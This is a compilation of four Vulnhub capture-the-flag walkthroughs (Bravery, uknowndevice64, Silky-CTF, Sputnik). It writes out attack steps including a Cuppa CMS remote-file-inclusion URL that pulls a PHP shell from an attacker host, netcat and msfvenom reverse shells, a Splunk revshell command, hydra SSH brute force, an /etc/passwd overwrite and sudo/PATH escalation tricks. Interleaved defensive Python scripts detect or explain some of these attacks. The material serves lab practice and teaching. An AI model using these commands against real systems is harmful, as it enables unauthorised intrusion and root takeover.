digitalworld.local-BRAVERY: Vulnhub Walkthrough


Today we will be solving a boot2root lab from Vulnhub called digitalworld.local: BRAVERY. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.
Penetration Methodologies
Scanning
·         Netdiscover
·         Nmap
Enumeration
·         Mount NFS share directory
·         SMB shared file enumeration
Exploiting
·         Abusing CMS via RFI
·         Obtaining reverse shell via netcat
Privilege Escalation
·         Abusing SUID binary
·         Capture the Flag

Walkthrough

Scanning
Let’s start with network scanning to identify the IP of the VM with the help of netdiscover.


So we have our target IP, 192.168.1.105. Now let's scan its ports and services with nmap.
nmap -A 192.168.1.105
The nmap scan returned plenty: many services are running on various ports.


Enumeration
Since the scan shows NFS on port 2049, we checked for directories exported on the network. Install the NFS client on the local machine and run showmount to list the exports available to mount locally.
showmount -e 192.168.1.105
We found that /var/nfshare is exported, so we mounted it on our local machine as shown below:
mkdir /tmp/raj
mount -t nfs 192.168.1.105:/var/nfshare /tmp/raj
cd /tmp/raj
ls
cat discovery
cat enumeration
cat explore
cat password.txt
cat qwertyuioplkjhgfdsazxcvbnm

Hmmm!!! After reading all the files, we concluded that “qwertyuioplkjhgfdsazxcvbnm” could be a password.


Port 445 is also open for SMB, and we now have a candidate password, so we can try it against the SMB shares. First we need to enumerate the shares themselves, and for that we can use enum4linux.
enum4linux 192.168.1.105


As you can observe, enum4linux showed two shares: anonymous and secured. We can access them with smbclient.
smbclient //192.168.1.105/anonymous
password: qwertyuioplkjhgfdsazxcvbnm
We successfully accessed the share and saw some user folders, but internal recon turned up no interesting clues.


So I moved on to the other share, "secured", where I found three files and downloaded them to my local machine.
smbclient //192.168.1.105/secured -U David
password: qwertyuioplkjhgfdsazxcvbnm
get david.txt
get genevieve.txt
get README.txt


Opening each file revealed some helpful URLs, which we will visit one by one; the last line of the file also hinted at a CMS login.

Initially, we looked at the URL given below, but it was of no use to us.


We then explored another URL and found nothing useful there either.
https://192.168.1.105/devops/devlopmentsecretpagev1.php

We moved to the third and final URL from genevieve.txt. Fortunately, this webpage differed from the two previous results and looked like it could be a CMS.


Exploring the other tabs, I found a Cuppa CMS login page. This could be the turning point, since Cuppa CMS has known exploits we can attempt.


Exploiting
Without wasting time I dug out the Cuppa CMS exploit with searchsploit: the CMS is vulnerable to LFI/RFI.


Checking the PoC, I found the Remote File Inclusion URL. We now need to prepare a reverse shell to exploit the RFI.


I used php-reverse-shell from /usr/share/webshells/php, changed the listening IP to Kali’s IP, started a Python HTTP server to serve the file, and started a netcat listener on the chosen port.


When everything is ready, trigger the following URL to exploit the RFI:
http://192.168.1.105/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.1.110:8000/shell.php?
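The request above works because the value of urlConfig is fetched and included as PHP. From the defender's side the same thing shows up in the web server's access log as a query-string value that is itself a URL pointing at another host. The scanner below is an added example, not code from the original walkthrough or from Cuppa CMS; it assumes a combined-format access log (the regex is mine), the log lines are constructed for the example, and the set of schemes treated as "remote" is my choice. Note that it also flags URL-valued parameters such as open-redirect targets, so it is an indicator to triage, not a verdict.

```python
"""Flag remote-file-inclusion attempts in web-server access logs.

Added example for this walkthrough, not part of the original post. The log
lines below are constructed for the example, not captured from the lab.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined"-style request line: client, method, target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Wrappers PHP's include()/require() will open when allow_url_include=On:
# http/https/ftp fetch from a host the attacker controls, data: embeds the
# payload in the URL itself, php:// wrappers read local streams.
REMOTE_SCHEMES = {"http", "https", "ftp", "data", "php"}

SAMPLE_LOG = """\
192.168.1.110 - - [20/May/2019:10:01:02 +0000] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.1.110:8000/shell.php? HTTP/1.1" 200 512
192.168.1.50 - - [20/May/2019:10:01:05 +0000] "GET /genevieve/cuppaCMS/index.php?page=home HTTP/1.1" 200 1024
192.168.1.110 - - [20/May/2019:10:02:11 +0000] "GET /about.php?next=https://example.org/path HTTP/1.1" 302 0
192.168.1.77 - - [20/May/2019:10:03:00 +0000] "POST /login.php HTTP/1.1" 200 300
192.168.1.110 - - [20/May/2019:10:04:00 +0000] "GET /index.php?file=data://text/plain,PD9waHAgcGhwaW5mbygpOyA/Pg== HTTP/1.1" 200 700
"""


def remote_params(target: str) -> list[tuple[str, str]]:
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if urlsplit(value).scheme.lower() in REMOTE_SCHEMES:
            hits.append((name, value))
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse each access-log line and report requests carrying remote-URL parameters."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand: skip rather than guess
        hits = remote_params(m["target"])
        if hits:
            findings.append({
                "client": m["client"],
                "path": urlsplit(m["target"]).path,
                "params": hits,
                "status": int(m["status"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['status']} {f['path']} {f['params']}")
```

Against the constructed log it reports the Cuppa RFI request, the redirect parameter on /about.php and the data: wrapper on /index.php, and stays quiet on the ordinary page=home request. A 200 on a flagged request is the one worth pulling the body for.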


As soon as the URL is triggered we get a netcat session on the victim’s machine. This is a low-privilege shell, so we need to escalate to a higher-privilege one. To find SUID-enabled binaries, I ran the following command:
find / -perm -u=s -type f 2>/dev/null
Hmmm! Here I noticed that cp (the copy command) has the SUID bit set, which means it can write a file to any location as root. Let’s escalate privilege by abusing that SUID binary to copy an edited /etc/passwd file onto the victim’s machine.


Privilege Escalation
Suppose I want to create a new user (raj) with root privileges in the victim’s /etc/passwd file. First copy the content of the victim’s /etc/passwd into a text file on the local machine, then generate a password hash for raj with openssl passwd and copy the hash value.


Now open the text file holding the victim’s /etc/passwd content and add a new line for user raj carrying the generated hash, with UID 0 and GID 0. Name the file passwd and transfer it to the victim machine so that we can replace the VM’s original /etc/passwd with ours.


Once passwd has been transferred to the victim (here into /tmp), run the following commands to overwrite /etc/passwd, switch to raj and grab the flag as root.
cd /tmp
cp passwd /etc/passwd
su raj
cd /root
ls
cat proof.txt
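The escalation above leaves two things in /etc/passwd that never belong there: a second UID-0 account and a password hash in field 2 instead of the "x" that defers to /etc/shadow. The audit below is an added example, not code from the original walkthrough; the passwd content is constructed, and the hash in it is a placeholder of the right shape (MD5-crypt, as openssl passwd -1 produces), not a real credential.

```python
"""Audit /etc/passwd for the backdoor planted by the SUID cp trick.

Added example for this walkthrough, not part of the original post. The sample
passwd content is constructed; the hash is a placeholder, not a real credential.
"""
from __future__ import annotations

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
david:x:1000:1000:David:/home/david:/bin/bash
raj:$1$4Hpzt8sL$2WzbwkR0bAGPT5A3e7tIb1:0:0:raj:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
"""

# Values in field 2 that mean "look in /etc/shadow" or "login disabled".
SHADOWED = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> list[dict]:
    """Split passwd lines into dicts; keep malformed lines so they can be reported."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "line": lineno, "malformed": False, "name": name, "pw": pw,
            "uid": int(uid), "gid": int(gid), "gecos": gecos, "home": home, "shell": shell,
        })
    return entries


def audit_passwd(text: str) -> list[tuple[int, str, str]]:
    """Return (line, finding, detail) triples for suspicious entries."""
    findings = []
    seen_uids = {}
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], "malformed", e["raw"]))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["line"], "extra-uid0", e["name"]))
        if e["pw"] == "":
            findings.append((e["line"], "empty-password", e["name"]))
        elif e["pw"] not in SHADOWED:
            # A hash here is world-readable and bypasses /etc/shadow entirely.
            findings.append((e["line"], "hash-in-passwd", e["name"]))
        if e["uid"] in seen_uids:
            findings.append((e["line"], "duplicate-uid",
                             f"{e['name']} shares uid {e['uid']} with {seen_uids[e['uid']]}"))
        else:
            seen_uids[e["uid"]] = e["name"]
    return findings


if __name__ == "__main__":
    for line, kind, detail in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line}: {kind}: {detail}")
```

Run it against a live box with audit_passwd(open("/etc/passwd").read()); the raj line from the walkthrough trips three of the four checks at once, which is why this backdoor is so easy to spot after the fact.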

Vulnhub Walkthrough: uknowndevice64 v2.0



Today we are going to take on another boot2root challenge, “uknowndevice64 v2.0” by Ajay Verma. Our goal is to get root and read flag.txt in at least two different ways.
Difficulty: Beginner
Penetrating Methodology:
Scanning
  • Netdiscover
  • NMAP
Enumeration
  • Web Directory search 
  • Credential harvesting
Exploiting
  • SSH login (1st Method)
  • ADB login (2nd Method)
Privilege Escalation
  • Exploit sudo rights
Capture the Flag

Walkthrough

Scanning:

Let’s start off by scanning the network and identifying host IPs. Using netdiscover we identify our target IP as 192.168.1.22. Next, we scan this IP with nmap.
netdiscover
nmap -p- -A 192.168.1.22

The result shows freeciv on port 5555, ssh on port 6465 and netbus on port 12345. The freeciv and netbus labels are nmap’s service-fingerprint guesses; as we will see, port 12345 actually serves HTTP and port 5555 is ADB.



First, we opened the IP in the browser on port 12345 and were prompted to log in. We tried basic credential combinations and succeeded with ‘Administrator’ as the username and ‘password’ as the password.


After logging in, a webpage appeared as you can see here, but nothing of use to us.



Then we tried the robots.txt file. We got lucky and found a file named ‘./info.php’ listed inside it.


When we opened it in the browser, we were prompted to download it.



When we open the downloaded file, we find an SSH private key inside it. So we copied the text from “BEGIN RSA PRIVATE KEY” to “END RSA PRIVATE KEY” and saved it in a file named ‘sshkey’. After the key, at the end of the file, is the string “unkn0wnd3vic3-64”; let’s keep that for now.
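Pulling the key out of info.php by hand works for one file; the parser below does the same cut by the BEGIN/END markers, reads the PEM headers (or, for the newer OpenSSH key format, the cipher field of the blob) to tell you before running ssh -i whether a passphrase prompt is coming, and keeps whatever text trails the key, which here is the candidate passphrase. It is an added example, not code from the original walkthrough; the sample file is constructed and its key body is a placeholder, not the lab’s key.

```python
"""Extract an SSH private key from a mixed file and tell whether it needs a passphrase.

Added example for this walkthrough, not part of the original post. The sample
input is constructed; the key body is a placeholder, not a real key.
"""
from __future__ import annotations

import base64
import re

PEM_RE = re.compile(r"-----BEGIN ([A-Z0-9 ]+)-----\n(.*?)-----END \1-----", re.S)

SAMPLE_INFO_PHP = """\
<?php // constructed sample, not the lab file
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

Q29uc3RydWN0ZWQgcGxhY2Vob2xkZXIga2V5IGJvZHksIG5vdCBhIHJlYWwga2V5
-----END RSA PRIVATE KEY-----
unkn0wnd3vic3-64
"""

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def openssh_cipher(blob: bytes) -> str:
    """openssh-key-v1 starts with the magic, then a length-prefixed cipher name; "none" means plaintext."""
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(OPENSSH_MAGIC)
    n = int.from_bytes(blob[off:off + 4], "big")
    return blob[off + 4:off + 4 + n].decode("ascii")


def openssh_header_stub(cipher: str) -> bytes:
    """Leading fields of an openssh-key-v1 blob only, enough for cipher detection (constructed, not a key)."""
    return OPENSSH_MAGIC + len(cipher).to_bytes(4, "big") + cipher.encode("ascii")


def openssh_pem_stub(cipher: str) -> str:
    """PEM-wrap the header stub so extract_keys can be exercised on the OpenSSH format."""
    b64 = base64.b64encode(openssh_header_stub(cipher)).decode("ascii")
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def extract_keys(text: str) -> list[dict]:
    """Find every PEM block and report its type, whether it is encrypted, and the cipher."""
    keys = []
    for m in PEM_RE.finditer(text):
        label, body = m.group(1), m.group(2)
        lines = body.strip().splitlines()
        headers = {}
        # Traditional PEM puts "Proc-Type: 4,ENCRYPTED" and "DEK-Info: cipher,iv" before a blank line.
        while lines and ":" in lines[0]:
            k, v = lines.pop(0).split(":", 1)
            headers[k.strip()] = v.strip()
        if lines and lines[0] == "":
            lines.pop(0)
        if label == "OPENSSH PRIVATE KEY":
            cipher = openssh_cipher(base64.b64decode("".join(lines)))
            encrypted = cipher != "none"
        else:
            encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
            cipher = headers.get("DEK-Info", "").split(",")[0] or None
        keys.append({"type": label, "encrypted": encrypted, "cipher": cipher, "pem": m.group(0)})
    return keys


def trailing_text(text: str) -> str:
    """Whatever follows the last PEM block, e.g. a passphrase left next to the key."""
    last = None
    for m in PEM_RE.finditer(text):
        last = m
    return text[last.end():].strip() if last else ""


if __name__ == "__main__":
    for k in extract_keys(SAMPLE_INFO_PHP):
        print(k["type"], "encrypted" if k["encrypted"] else "plaintext", k["cipher"])
    print("trailer:", trailing_text(SAMPLE_INFO_PHP))
```

The "pem" field is what you write to the sshkey file. An encrypted traditional key announces itself through Proc-Type, while an OpenSSH-format key hides it inside the base64, which is why the blob is decoded for that case.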



First we restricted the permissions on the ‘sshkey’ file, then used it to log in over ssh on port 6465 (where ssh is listening). We were prompted for the key’s passphrase, so we entered the text “unkn0wnd3vic3-64” saved from info.php, and it worked. After that we switched to the root user and listed the contents of root’s directory.
chmod 600 sshkey
ssh -i sshkey 192.168.1.22 -p 6465
su root
ls
We spotted a directory named ‘system’ and inside it found a file ‘flag.txt’. This is our flag!


Another way

We reuse what we already know to save time. The nmap scan reported freeciv on port 5555, which is ADB’s default port, so we connected to it with adb. After getting a shell we switched to root and grabbed the flag (we already know it is in flag.txt inside the system directory).
adb connect 192.168.1.22:5555
adb shell
su root
cat system/flag.txt

Finally!! The challenge is completed, and we have grabbed the flag.txt file using two different approaches.

Silky-CTF: 0x01: Vulnhub Walkthrough


Today we will be solving a boot2root lab from Vulnhub called SILKY-1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Level: Easy-Intermediate
Task: Boot to Root (flag.txt)

Penetration Methodologies
Scanning
·         Netdiscover
·         Nmap
Enumeration
·         Web spidering
·         Robots.txt
·         Generating Password Dictionary (Crunch)
Exploit
·         Brute force attack (Hydra)
·         SSH Login
Privilege Escalation
·         Identify SUID-enabled binaries
·         Exploit PATH variable
Capture the flag

WALKTHROUGH

Scanning
We start by scanning the network for targets using Netdiscover.
netdiscover


So we found the target IP 192.168.1.106 and proceed by running an Nmap scan of its ports to see what we can find.

nmap  -A 192.168.1.106



Since port 8080 is running an HTTP proxy, the obvious choice is to browse the target’s IP in the browser, but we didn’t find any hint there.


Enumeration
We checked the robots.txt file reported by nmap; it pointed to /notes.txt as our next lead.


Exploring notes.txt, we found a text message written in German.

With the help of Google Translate I translated the German message, which turned out to be a password hint:
I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still.




Then I revisited the home page to view its source code and found a link to script.js.


Navigating to /script.js I found the word s1lKy, as shown below. Hmmm!!! This could be the partial password mentioned in the message above.




So, without wasting time, I decided to generate a dictionary with crunch. According to the message the last 2 characters are missing, but those 2 characters could be any combination: lowercase-lowercase, lowercase-uppercase, letter-digit, letter-symbol, and so on.

After almost an hour I found the valid combination for the ssh login (port 22 is open). The pattern that worked is below; in crunch’s -t syntax ^ stands for a symbol and % for a digit.

crunch 7 7 -t s1lky^% >> pass.txt
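The hour spent above is the cost of guessing which character classes the two missing characters belong to. The script below is an added example, not code from the original walkthrough and not crunch’s own code: it expands a crunch-style -t pattern (@ lowercase, , uppercase, % digit, ^ symbol, anything else literal) and, going beyond the single pattern used on this box, lists every class combination for the two unknown characters with its candidate count, so the small keyspaces can be tried first. The symbol set is an assumption for the example and may differ from crunch’s default list.

```python
"""Expand a crunch-style -t pattern and size the keyspace before brute-forcing.

Added example for this walkthrough, not part of the original post and not
crunch's own code. SYMBOLS is an assumed set; crunch's default may differ.
"""
from __future__ import annotations

import itertools
import string
from typing import Iterator

SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/"  # assumed symbol set, 32 characters
CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": SYMBOLS,
}


def slots(pattern: str) -> list[str]:
    """One candidate alphabet per position: a class for placeholders, the character itself otherwise.

    A literal @ , % or ^ would need crunch's -l escape; that is not handled here.
    """
    return [CLASSES.get(ch, ch) for ch in pattern]


def expand_pattern(pattern: str) -> Iterator[str]:
    """Yield every word the pattern describes; the last position varies fastest."""
    for combo in itertools.product(*slots(pattern)):
        yield "".join(combo)


def keyspace(pattern: str) -> int:
    """Number of words expand_pattern() would produce, without producing them."""
    n = 1
    for alphabet in slots(pattern):
        n *= len(alphabet)
    return n


def suffix_keyspaces(prefix: str, unknown: int = 2) -> dict[str, int]:
    """Every placeholder combination for `unknown` trailing characters, with its candidate count."""
    out = {}
    for combo in itertools.product(CLASSES, repeat=unknown):
        pattern = prefix + "".join(combo)
        out[pattern] = keyspace(pattern)
    return out


def write_wordlist(pattern: str, path: str) -> int:
    """Write the expansion to `path`, one word per line; returns the number of words written."""
    count = 0
    with open(path, "w") as fh:
        for word in expand_pattern(pattern):
            fh.write(word + "\n")
            count += 1
    return count


if __name__ == "__main__":
    # Smallest keyspaces first: the order in which to feed them to hydra.
    for pat, n in sorted(suffix_keyspaces("s1lky").items(), key=lambda kv: kv[1]):
        print(f"{pat:10} {n:6d} candidates")
    print("s1lky#5 covered by s1lky^%:", "s1lky#5" in set(expand_pattern("s1lky^%")))
```

The 16 two-character patterns total (26+26+10+32)^2 = 8836 candidates, so even the worst case is minutes of ssh attempts with hydra; the point is not to hand-pick one class combination at a time.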



Exploit
Assuming the username could be silky and the password is in pass.txt, I launched a brute-force attack with hydra against port 22 to identify a valid ssh login.

hydra -l silky -P pass.txt 192.168.1.106 ssh



Since we found silky:s1lky#5 as the username and password for ssh, it was time to log in over ssh and escalate to root to capture the flag.

ssh silky@192.168.1.106

Once logged in, without wasting much time I looked for SUID-enabled binaries, and /usr/bin/sky looks interesting.

find / -perm -u=s -type f 2>/dev/null

When run, this program prints “root” in its output along with some German text. To analyse it I inspected the binary with strings, a command-line utility that prints the printable character sequences found in a file.
strings /usr/bin/sky

Hmm!! The strings output shows that this program executes two commands: an echo that prints the German message, and then whoami.


Privilege Escalation
To escalate to root we can abuse the PATH variable as shown below (for more detail, read the complete article linked here).

cd /tmp
echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky
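The hijack works because sky calls whoami by bare name and inherits the caller’s PATH. The script below is an added example, not code from the original walkthrough: /usr/bin/sky is not available here, so its behaviour is modelled as what strings showed, a shell running the bare command whoami (which is what system() does). A fake whoami planted in a directory placed first in PATH is the attack; the hardened variant resets PATH and calls the binary by absolute path. It assumes a POSIX /bin/sh and that the working directory allows executables.

```python
"""Reproduce the PATH hijack used against /usr/bin/sky, and the fix.

Added example for this walkthrough, not part of the original post. The SUID
binary is stood in for by /bin/sh -c "whoami"; the fake whoami is the attacker's file.
"""
from __future__ import annotations

import os
import shutil
import subprocess
import tempfile

FAKE_WHOAMI = "#!/bin/sh\necho hijacked\n"  # stands in for the echo '/bin/sh' > whoami step
SAFE_PATH = "/usr/bin:/bin"


def run_like_sky(command: str, env: dict) -> str:
    """Run `command` through /bin/sh with the given environment, the way system() does."""
    result = subprocess.run(["/bin/sh", "-c", command], env=env,
                            capture_output=True, text=True)
    return result.stdout.strip()


def plant_fake_whoami() -> str:
    """Create a directory holding an executable named whoami; returns the directory."""
    try:
        hijack_dir = tempfile.mkdtemp(prefix=".hijack-", dir=os.getcwd())
    except OSError:  # working directory not writable: fall back to the system temp dir
        hijack_dir = tempfile.mkdtemp(prefix="hijack-")
    path = os.path.join(hijack_dir, "whoami")
    with open(path, "w") as fh:
        fh.write(FAKE_WHOAMI)
    os.chmod(path, 0o755)
    return hijack_dir


def attacker_env(hijack_dir: str) -> dict:
    """The caller's environment after `export PATH=/tmp:$PATH`, with our directory in /tmp's role."""
    env = dict(os.environ)
    env["PATH"] = hijack_dir + os.pathsep + env.get("PATH", SAFE_PATH)
    return env


def vulnerable(hijack_dir: str) -> str:
    """What sky does: trusts the inherited PATH, so the lookup of whoami hits the fake first."""
    return run_like_sky("whoami", attacker_env(hijack_dir))


def hardened(hijack_dir: str) -> str:
    """Same call with the two fixes: a privileged program sets its own PATH and uses absolute paths."""
    env = attacker_env(hijack_dir)
    env["PATH"] = SAFE_PATH
    return run_like_sky("/usr/bin/whoami", env)


def cleanup(hijack_dir: str) -> None:
    shutil.rmtree(hijack_dir, ignore_errors=True)


if __name__ == "__main__":
    d = plant_fake_whoami()
    try:
        print("vulnerable:", vulnerable(d))
        print("hardened:  ", hardened(d))
    finally:
        cleanup(d)
```

On the real box the fake whoami spawns /bin/sh instead of echoing, and because sky is SUID root the shell inherits the effective UID 0. Either fix alone defeats the attack; on a real SUID binary you would also drop the inherited environment rather than copy it.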

OKAY!! We got another shell, and it is a root shell as shown below. Let’s now grab the flag.txt file and complete the challenge.
id
cd /root
cat flag.txt


Sputnik 1: Vulnhub Walkthrough


Today we will be solving a boot2root lab from Vulnhub called Sputnik: 1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.
Level: Easy
Task: To find flag.txt
Table of Contents
Scanning 
·         Open ports and Running services (Nmap)
Enumeration 
·         Web Directory search 
·         Credential harvesting
Exploitation 
·         Splunk reverse and bind shell
·         Python reverse shell
·         Accessing shell
Privilege Escalation
·         Capture flag.txt

Scanning

We start by scanning the network for targets using Netdiscover
netdiscover



So we found target IP 192.168.1.103 and proceed by running a Nmap scan for all its ports to see what we can find.
nmap -p- -A 192.168.1.103

Enumeration

The scan shows ports 8089, 8191, 55555 and 61337 open. The service on port 55555 serves a directory listing with a link to a git repository; we copy the address into the browser to investigate.


We access the “Logs” directory and click on the “HEAD” file within.


There is a link to a Git page; following it we find Flappy. We use git clone to download the repository to our system for further investigation.
Once downloaded we explore its contents, but nothing stands out, so we look at the commit history.
git log


The command gives us the history of the repository and the search starts. We focus on the commits and go through them one by one.
Finally, we come across the highlighted commit and strike gold!


We use git ls-tree on that commit to list the tree it points to.
The listing shows a file named “secret”; we run git show on its blob hash to see what it reveals.
git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717   
git show f4385198ce1cab56e0b2a1c55e8863040045b085
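Reading commits one at a time found the secret here, but a history of any size calls for checking every added line against secret-shaped patterns. The scanner below is an added example, not code from the original walkthrough: it parses the text of git log -p (so it runs without git), tracks the current commit and file, and classifies each added line with a few explainable regexes plus a Shannon-entropy check for random-looking tokens. The log it runs on is constructed, not the Flappy repository’s real history, and the patterns and threshold are my choices.

```python
"""Scan `git log -p` output for secrets committed to a repository.

Added example for this walkthrough, not part of the original post. The log
below is constructed, not the real repository's history.
"""
from __future__ import annotations

import math
import re

SAMPLE_GIT_LOG = """\
commit 1111111111111111111111111111111111111111
Author: dev <dev@example.com>
Date:   Mon May 20 10:00:00 2019 +0000

    add secret file

diff --git a/secret b/secret
new file mode 100644
--- /dev/null
+++ b/secret
@@ -0,0 +1,2 @@
+# login for the dashboard
+admin:S3cret_Pass_2019!
commit 2222222222222222222222222222222222222222
Author: dev <dev@example.com>
Date:   Sun May 19 10:00:00 2019 +0000

    initial import

diff --git a/README.md b/README.md
new file mode 100644
--- /dev/null
+++ b/README.md
@@ -0,0 +1,2 @@
+# Flappy
+A small game.
"""

# Cheap, explainable patterns; first match wins, so the specific ones go first.
SECRET_PATTERNS = [
    ("private-key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("aws-access-key", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("keyword", re.compile(r"(?i)\b(password|passwd|secret|api[_-]?key|token)\b\s*[:=]\s*\S+")),
    # user:pass on a line of its own; the (?!//) keeps URLs such as http://host out.
    ("user-pass", re.compile(r"^[A-Za-z0-9_.-]+:(?!//)[^\s:]{8,}$")),
]
TOKEN_RE = re.compile(r"[A-Za-z0-9+/=_-]{20,}")
ENTROPY_THRESHOLD = 4.0  # bits per character; random base64 sits near 6, English text near 4


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character over the string's own symbol frequencies."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def classify(added: str) -> str | None:
    """Name the first pattern an added line matches, or 'high-entropy' for a random-looking token."""
    for kind, rx in SECRET_PATTERNS:
        if rx.search(added):
            return kind
    if any(shannon_entropy(t) > ENTROPY_THRESHOLD for t in TOKEN_RE.findall(added)):
        return "high-entropy"
    return None


def scan_git_log(text: str) -> list[dict]:
    """Walk `git log -p` output, tracking the current commit and file, and flag added lines."""
    commit = path = None
    findings = []
    for line in text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            path = line[4:]
            path = path[2:] if path.startswith("b/") else path
        elif line.startswith("+") and not line.startswith("+++"):
            kind = classify(line[1:])
            if kind:
                findings.append({"commit": commit[:7], "file": path, "kind": kind, "line": line[1:]})
    return findings


if __name__ == "__main__":
    for f in scan_git_log(SAMPLE_GIT_LOG):
        print(f"{f['commit']} {f['file']}: {f['kind']}: {f['line']}")
```

Feed it the real thing with scan_git_log(subprocess.check_output(["git", "log", "-p"], text=True)). Only added lines are inspected because a secret that was later deleted still lives in history, which is exactly the case on this box.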


Now what could this be? We recalled seeing a Splunk service running on port 61337, so we opened it in the browser and found the Splunk login screen.
192.168.1.103:61337


EXPLOITATION (SPLUNK)


The information from the previous screenshot is in fact a set of login credentials: the username is “sputnik” and the password is “ameer_says_thank_you_and_good_job”. We enter these and get into the Splunk account.
We looked around for a while and then decided to upload a shell to the account. Searching, we found a way to weaponize Splunk with reverse and bind shells: https://github.com/TBGSecurity/splunk_shells
We saved the .gz file from that repository on our system, then navigated to the “App: Search & Reporting” option and clicked on “Search & Reporting”.


Click on the “Install app from file” option.


Using the browse option, we find our shell, select it and upload it.


Click on the “Restart Now” to restart the application.


We scroll down to find our shell app as shown below. Before we can run it, we need to click on the “Permissions” option to change its permissions.


The app’s permissions need to be adjusted before its commands can run from a search: here we set the permission to Everyone, select the “All apps” radio button at the bottom, and save the change.


Now to execute the shell. We navigate to the search bar in Splunk and type the command defining a standard reverse shell that calls back to our attacking machine’s IP on the listening port.
| revshell std 192.168.1.110 1234


Access Victim’s Shell


Netcat is running on our machine listening on port 1234, and we see the shell calling back.
The “id” command was of no use in this shell, so we decided to step it up a notch.
nc -lvp 1234


We used Msfvenom to create a python payload.
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.110 lport=4444 R


The payload is delivered through our existing netcat session: all that needs to be done is to paste it into that terminal and execute it, with a second listener waiting on port 4444.
nc -lvp 4444


A new netcat session arrives on port 4444, the port we defined in our payload, and we see the execution occur flawlessly.

Privilege Escalation


We run the “id” command and see that our user is “splunk”.
Time for privilege escalation. At the splunk prompt we first run “sudo -l” and enter the password we used earlier to log into Splunk, “ameer_says_thank_you_and_good_job”; it shows that the splunk user can run ed as root.
So close to root! Now all we have to do is run “sudo ed” and then, at the ed prompt, “!/bin/sh” to spawn a shell. Type in “id” and there you go: we have root!
id
sudo -l
ameer_says_thank_you_and_good_job
sudo ed
!/bin/sh




Time to look for our flag.
We look in the root directory, find “flag.txt” and use “cat” to read it. Hooray for us!
As always, we at Hacking Articles hope you enjoy this lab and share it with your colleagues. This lab has a great feature that gives you an insight into exploiting Splunk. Overall the lab is easy and the level of frustration it might induce is minimal.
Have fun and stay ethical.